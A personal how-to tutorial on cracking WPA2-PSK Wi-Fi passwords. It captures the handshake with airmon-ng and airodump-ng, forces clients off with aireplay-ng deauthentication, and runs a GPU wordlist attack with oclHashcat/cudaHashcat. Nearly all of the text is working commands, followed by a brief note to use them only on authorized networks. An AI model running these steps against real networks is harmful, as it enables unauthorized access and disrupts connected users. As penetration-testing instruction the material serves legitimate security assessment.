GPU-assisted cracking WPA2-PSK passwords with aircrack-ng and oclHashCat

In order to crack a WPA2-PSK password, there are two main steps you need to take:

Step 1 is to capture the WPA2 handshake with aircrack-ng. I took the instructions here: http://www.aircrack-ng.org/doku.php?id=cracking_wpa and I'm using the mac80211 drivers, if you have a different setup you'll need to consult the aircrack tutorial accordingly.
Step 2 is to crack the password hash with a GPU-enabled cracking tool such as aircrack-ng or oclHashCat. In this tutorial I use oclHashCat.

Step 1: I used a Raspberry Pi running Kali Linux to capture the WPA2 handshake:

• Pro-tip: Bring your wireless interface down first otherwise you'll have trouble changing the channel! 
• ifconfig wlan0 down
• Start the capture interface (in order to change the channel to match the channel used by your target you need to specify the frequency here rather than the channel number, at least I did):
• airmon-ng start wlan0 2462

• Capture the handshake (wait until you see the "WPA Handshake" text appear):

• airodump-ng --channel 11 --bssid <mac_addr> -w psk mon0
• If you have problems with the channel, you may need to run airodump like: airodump-ng --channel 11,11 --bssid <mac_addr> -w psk mon0

• Optional: deauthenticate the wireless client to force it to reauthenticate so you can capture the handshake:
• aireplay-ng -0 1 -a <access_point_address> -c <mac_addr_to_deauthenticate> mon0

•  If you have problems with the "fixed channel -1" message in airodump, you may need to run aireplay like this: 
• aireplay-ng -0 1 -a  <access_point_address> -c <mac_addr_to_deauthenticate> --ignore-negative-one -e <essid_name> mon0 

• Grab a decent wordlist as  this is really the key to the whole password cracking endeavour, without a decent wordlist you're going nowhere. Keep in mind that passwords may be language specific, so the standard wordlists might not help you if you're not in an English speaking country, for example. A good place to start is the Aircrack FAQ: http://www.aircrack-ng.org/doku.php?id=faq

• Optional: Crack the key with vanilla aircrack, that is, without GPU support:

• aircrack-ng -w <wordlist> -b <mac_addr> psk*.cap

Step 2: For GPU cracking you need to use oclHashCat (or compile the SVN version of aircrack-ng from source). I did this on an Ubuntu 13.04 machine with an NVIDIA graphics card using the NVDIA binary drivers which you may need to install if you're using Noveau. If you have an AMD/ATI card, you'll need the Catalyst drivers installed. So you need to transfer your .cap files over from your capture machine to your GPU cracking machine if necessary.
Pro tip: there are two main versions of HashCat (aside from the standard 32/64 bit versions):

1. oclHashCat for AMD/ATI graphics cards
2. cudaHashCat for NVIDIA graphics cards

Then do the following steps:

• Grab oclHashcat from here: 
• http://hashcat.net/files/oclHashcat-plus-0.14.7z
• Extract it with  
• 7z x oclHashcat-plus-0.14.7z (don't use 7x e as it will not preserve the directory structure correctly when extracting and hashcat won't work)
• Optional: install the NVIDIA CUDA packages:
• sudo apt-get install nvidia-cuda-*
• Since the version of aircrack-ng that ships with Kali Linux does not support the -J flag (which creates a hashcat capture file from the WPA handshake capture which aircrack-ng uses by default), you need to grab the latest version of aircrack-ng from here: http://download.aircrack-ng.org/aircrack-ng-1.2-beta1.tar.gz 
• Extract: 
• tar zxvf aircrack-ng-1.2-beta1.tar.gz
• Make sure you have the appropriate support tools installed:  
• sudo apt-get install build-essential libssl-dev libsqlite3-dev
• Build:
• make (optional: make install)
• Once you have built the binary, convert the WPA2 handshake capture to a hashcat file with:
•  aircrack-ng psk-01.cap -J <name_of_your_hashcat_capture_file>
• Run hashcat against your new capture file (choose the version of hashcat that machines your CPU architecture and your graphics card):
• cudaHashcat-plus32.bin -m 2500 <filename>.hccap <wordlist>

• Enjoy your crispy new password! :-)

Obviously: only use these tools against a network that you are authorized to assess!